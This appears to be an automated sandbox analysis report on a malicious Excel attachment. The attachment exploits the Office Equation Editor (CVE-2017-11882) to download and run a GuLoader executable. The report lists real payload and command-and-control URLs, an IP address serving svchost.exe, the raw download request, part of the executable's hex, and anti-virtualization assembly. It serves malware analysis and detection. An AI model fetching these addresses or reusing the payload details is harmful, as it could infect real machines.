Analysis Report BL_SGN11203184.xlsx

Overview

General Information

Sample Name:	BL_SGN11203184.xlsx
Analysis ID:	432590
MD5:	06eb9a2b3d7113604968b87722ed242a
SHA1:	2a6929b76b8b69a4e3a3766881280c63af765cb1
SHA256:	1554d0f1b36381c9a323749cd62b7870c8273d8020fc81df09cb159a3bb84acc
Tags:	VelvetSweatshopxlsx
Infos:
Most interesting Screenshot:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected GuLoader

C2 URLs / IPs found in malware configuration

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Drops PE files to the user root directory

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Sigma detected: Execution from Suspicious Folder

Tries to detect virtualization through RDTSC time measurements

Abnormal high CPU Usage

Allocates a big amount of memory (probably used for heap spraying)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Document misses a certain OLE stream usually present in this Microsoft Office document type

Downloads executable code via HTTP

Drops PE files

Drops PE files to the user directory

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

PE file contains strange resources

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Signatures

AV Detection:

Antivirus detection for URL or domain

Source: http://103.155.82.236/fksdoc/svchost.exe

Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000004.00000002.2364907663.0000000000440000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://www.pos.nblwarehouse.my.id/bin_GgrWeMMq137.bin, http://benvenuti.rs/wp-co"}

Multi AV Scanner detection for domain / URL

Source: http://103.155.82.236/fksdoc/svchost.exe

Virustotal: Detection: 12%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe	Metadefender: Detection: 28%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe	ReversingLabs: Detection: 58%
Source: C:\Users\Public\vbc.exe	Metadefender: Detection: 28%	Perma Link
Source: C:\Users\Public\vbc.exe	ReversingLabs: Detection: 58%

Multi AV Scanner detection for submitted file

Source: BL_SGN11203184.xlsx

ReversingLabs: Detection: 21%

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Software Vulnerabilities:

Allocates a big amount of memory (probably used for heap spraying)

Source: excel.exe

Memory has grown: Private usage: 4MB later: 46MB

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 103.155.82.236:80

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 103.155.82.236:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic

Snort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49167 -> 103.155.82.236:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://www.pos.nblwarehouse.my.id/bin_GgrWeMMq137.bin, http://benvenuti.rs/wp-co

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 10 Jun 2021 13:17:37 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Wed, 09 Jun 2021 07:07:06 GMTETag: "24000-5c44fec1ebc1c"Accept-Ranges: bytesContent-Length: 147456Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b 23 c4 db cf 42 aa 88 cf 42 aa 88 cf 42 aa 88 4c 5e a4 88 ce 42 aa 88 80 60 a3 88 cd 42 aa 88 f9 64 a7 88 ce 42 aa 88 52 69 63 68 cf 42 aa 88 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 03 b2 bb 47 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 10 02 00 00 30 00 00 00 00 00 00 10 1c 00 00 00 10 00 00 00 20 02 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 50 02 00 00 10 00 00 30 8e 02 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 0f 02 00 28 00 00 00 00 40 02 00 50 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 c4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e8 05 02 00 00 10 00 00 00 10 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 50 12 00 00 00 20 02 00 00 10 00 00 00 20 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 09 00 00 00 40 02 00 00 10 00 00 00 30 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: TWIDC-AS-APTWIDCLimitedHK TWIDC-AS-APTWIDCLimitedHK

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /fksdoc/svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.155.82.236Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F77229A3.emf

Jump to behavior

Source: global traffic

Source: F77229A3.emf.0.dr

String found in binary or memory: http://www.day.com/dam/1.0

System Summary:

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe			Jump to dropped file

Abnormal high CPU Usage

Source: C:\Users\Public\vbc.exe

Process Stats: CPU usage > 98%

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior

Contains functionality to call native functions

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00446A2E NtAllocateVirtualMemory,	4_2_00446A2E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00446A78 NtAllocateVirtualMemory,	4_2_00446A78
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00446C20 NtAllocateVirtualMemory,	4_2_00446C20
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00446AF8 NtAllocateVirtualMemory,	4_2_00446AF8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00446B94 NtAllocateVirtualMemory,	4_2_00446B94

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00401C10	4_2_00401C10
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004055F3	4_2_004055F3
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00446A2E	4_2_00446A2E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00444440	4_2_00444440
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0044185A	4_2_0044185A
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0044666C	4_2_0044666C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00446A78	4_2_00446A78
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0044B409	4_2_0044B409
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0044341C	4_2_0044341C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00446629	4_2_00446629
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00443834	4_2_00443834
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00443A30	4_2_00443A30
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00443238	4_2_00443238
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004434C0	4_2_004434C0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004436DE	4_2_004436DE
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00446AF8	4_2_00446AF8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00444490	4_2_00444490
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004432A0	4_2_004432A0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00443AA0	4_2_00443AA0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004466B8	4_2_004466B8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0044350C	4_2_0044350C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0044450C	4_2_0044450C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00443714	4_2_00443714
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0044331C	4_2_0044331C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00443925	4_2_00443925
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00443B30	4_2_00443B30
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0044173C	4_2_0044173C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004439DC	4_2_004439DC
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004431D8	4_2_004431D8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004447ED	4_2_004447ED
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004443FB	4_2_004443FB
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00443788	4_2_00443788
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00444993	4_2_00444993
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004433A4	4_2_004433A4
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004417B8	4_2_004417B8

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: BL_SGN11203184.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

PE file contains strange resources

Source: svchost[1].exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@4/16@0/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$BL_SGN11203184.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRF085.tmp

Jump to behavior

Source: C:\Users\Public\vbc.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: BL_SGN11203184.xlsx

ReversingLabs: Detection: 21%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: BL_SGN11203184.xlsx

Static file information: File size 1317888 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: BL_SGN11203184.xlsx

Initial sample: OLE indicators vbamacros = False

Source: BL_SGN11203184.xlsx

Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Yara detected GuLoader

Source: Yara match

File source: 00000004.00000002.2364907663.0000000000440000.00000040.00000001.sdmp, type: MEMORY

Yara detected GuLoader

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000004.00000000.2151758048.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2364880980.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\Public\vbc.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe, type: DROPPED
Source: Yara match	File source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00409C54 push es; iretd	4_2_00409C5E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040605F push 00000059h; retf	4_2_00406061
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00406E64 push eax; retf	4_2_00406E65
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040A065 pushad ; retf	4_2_0040A0B8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00409E0D push edx; iretd	4_2_00409E12
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00409EF8 push ss; iretd	4_2_00409EFE
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00406AFE push es; iretd	4_2_00406B02
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004079CA push cs; iretd	4_2_004079CE
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00409387 push ss; iretd	4_2_004093A6
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00408D90 push cs; iretd	4_2_00408D9E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00403191 push dword ptr [ebp-44h]; ret	4_2_0041ECA4
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00445356 push edi; iretd	4_2_00445357

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: BL_SGN11203184.xlsx

Stream path 'EncryptedPackage' entropy: 7.99983573817 (max. 8.0)

Malware Analysis System Evasion:

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 0000000000449F94 second address: 000000000044A040 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a sub esp, 00000100h 0x00000010 mov edi, esp 0x00000012 test cx, dx 0x00000015 add esp, 00000100h 0x0000001b test eax, eax 0x0000001d mov dword ptr [edi+28h], eax 0x00000020 test bx, dx 0x00000023 mov esi, BEC25DA1h 0x00000028 add esi, 4F1D403Dh 0x0000002e xor esi, E8F819C0h 0x00000034 add esi, 1AD96BE2h 0x0000003a jmp 00007F0994A9E00Eh 0x0000003c pushad 0x0000003d mov eax, 0000003Fh 0x00000042 cpuid 0x00000044 popad 0x00000045 add esi, 00001000h 0x0000004b cmp esi, 0000F000h 0x00000051 je 00007F0994A9E520h 0x00000057 cmp esi, 7FFFF000h 0x0000005d je 00007F0994A9E514h 0x00000063 push 0AF1A7F6h 0x00000068 xor dword ptr [esp], 7FA34B79h 0x0000006f pushad 0x00000070 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 000000000044A040 second address: 000000000044A040 instructions:

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 0000000000449F94 second address: 000000000044A040 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a sub esp, 00000100h 0x00000010 mov edi, esp 0x00000012 test cx, dx 0x00000015 add esp, 00000100h 0x0000001b test eax, eax 0x0000001d mov dword ptr [edi+28h], eax 0x00000020 test bx, dx 0x00000023 mov esi, BEC25DA1h 0x00000028 add esi, 4F1D403Dh 0x0000002e xor esi, E8F819C0h 0x00000034 add esi, 1AD96BE2h 0x0000003a jmp 00007F0994A9E00Eh 0x0000003c pushad 0x0000003d mov eax, 0000003Fh 0x00000042 cpuid 0x00000044 popad 0x00000045 add esi, 00001000h 0x0000004b cmp esi, 0000F000h 0x00000051 je 00007F0994A9E520h 0x00000057 cmp esi, 7FFFF000h 0x0000005d je 00007F0994A9E514h 0x00000063 push 0AF1A7F6h 0x00000068 xor dword ptr [esp], 7FA34B79h 0x0000006f pushad 0x00000070 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 000000000044A040 second address: 000000000044A040 instructions:

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00446454 rdtsc

4_2_00446454

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2336

Thread sleep time: -300000s >= -30000s

Jump to behavior

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00446454 rdtsc

4_2_00446454

Contains functionality to read the PEB

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00444440 mov eax, dword ptr fs:[00000030h]	4_2_00444440
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004436DE mov eax, dword ptr fs:[00000030h]	4_2_004436DE
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004490F5 mov eax, dword ptr fs:[00000030h]	4_2_004490F5
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004464F9 mov eax, dword ptr fs:[00000030h]	4_2_004464F9
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0044993D mov eax, dword ptr fs:[00000030h]	4_2_0044993D
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004443FB mov eax, dword ptr fs:[00000030h]	4_2_004443FB

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

